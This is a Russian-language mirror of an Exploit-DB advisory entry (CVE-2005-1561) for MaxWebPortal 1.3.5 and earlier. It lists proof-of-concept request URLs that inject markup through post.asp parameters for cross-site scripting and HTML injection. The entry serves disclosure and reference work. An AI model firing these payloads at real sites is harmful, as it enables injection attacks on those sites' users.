- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 25651
- Проверка EDB
-
- Пройдено
- Автор
- ZINHO
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2005-1561
- Дата публикации
- 2005-05-11
Код:
source: https://www.securityfocus.com/bid/13601/info
MaxWebPortal is affected by multiple remote vulnerabilities. These issues may allow an attacker to carry out cross-site scripting, SQL injection and HTML injection attacks.
MaxWebPortal 1.3.5 and prior versions are reportedly vulnerable to these issues.
Cross-site Scripting
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&mod="><plaintext>
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&M="><plaintext>
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&type="><plaintext>
HTML Injection:
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=http://<plaintext>
- Источник
- www.exploit-db.com